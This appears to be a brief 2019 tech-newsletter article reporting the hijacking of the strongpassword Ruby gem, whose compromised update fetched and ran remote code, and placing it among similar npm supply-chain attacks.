Jul 12, 2019

Package hijacking spreads to the Ruby ecosystem as malicious code is inserted into compromised Ruby gem

RubyGems, a package manager for the Ruby programming language, was the latest platform to be targeted by package hijackers. An update to the RubyGems package strongpassword added a few lines of code that would check to see if the gem was running in production and, if so, fetch and run arbitrary code stored in a Pastebin post. The strongpassword package is a fairly popular gem, having been downloaded over 250,000 times in its lifetime. The malicious code was discovered by a developer who notified RubyGems after performing a security audit of his own application’s dependencies. The RubyGems team pulled the package version and locked the associated account. Later analysis revealed that the original developer of the package had his account credentials compromised, giving the hacker unrestricted access.

RubyGems is a package manager that provides a standard format for distributing Ruby libraries (called gems), a tool to install gems, and a service for hosting gems for the community at RubyGems.org. Similar to the npm registry and command line tool, RubyGems allows developers to extend the functionality of their code with a huge ecosystem of open source projects. Unlike RubyGems, however, npm is operated by a for-profit company that offers other services through its package registry.

RubyGems is another victim in a string of similar attacks. Over the past few months, the open source JavaScript community has been under increasing scrutiny after a number of high-profile issues with npm packages. Most recently, a hacker built a trustworthy npm package, only adding malicious code once the package was successfully deployed to an open source project to which the hacker had contributed. Ruby, unfortunately, will need to cope with similar vulnerabilities in its platform.

The pervasiveness and persistence of hijacking attacks proves that no developer ecosystem is entirely immune from such security concerns. Different package registries, however, are implementing different protective measures on different timelines, meaning developers will likely have to navigate a patchwork of trustworthiness across programming languages.

Want to get more of these in your inbox?

Subscribe for weekly updates from the Software team.